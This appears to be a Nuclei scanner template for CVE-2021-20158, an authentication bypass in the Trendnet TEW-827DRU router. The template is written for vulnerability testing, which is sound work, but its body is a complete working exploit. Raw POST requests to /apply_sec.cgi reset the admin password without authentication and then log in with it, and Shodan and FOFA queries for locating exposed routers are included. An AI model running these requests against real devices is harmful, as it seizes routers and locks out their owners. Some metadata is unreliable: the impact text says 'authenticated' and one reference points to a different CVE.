id: CVE-2021-20158 info: name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change author: gy741 severity: critical description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command. impact: | An attacker with authenticated access can gain unauthorized control over the affected device. remediation: | Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-20158 cwe-id: CWE-306 epss-score: 0.01211 epss-percentile: 0.8522 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 2 vendor: trendnet product: tew-827dru_firmware shodan-query: - http.html:"TEW-827DRU" - http.html:"tew-827dru" fofa-query: body="tew-827dru" tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet variables: password: "{{rand_base(6)}}" http: - raw: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}} - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= matchers-condition: and matchers: - type: word part: body words: - 'setConnectDevice' - 'setInternet' - 'setWlanSSID' - 'TEW-827DRU' condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a004730450221008e7e01cc14a060ad40896cdbbb43c308b2ee4fd5a25756f3e3919c0a4897348202206805d2f1c31c886b77a4c6bcc7a223b139a34efba3c0f86f3e31d2395a37034b:922c64590222798bb761d5b6d8e72950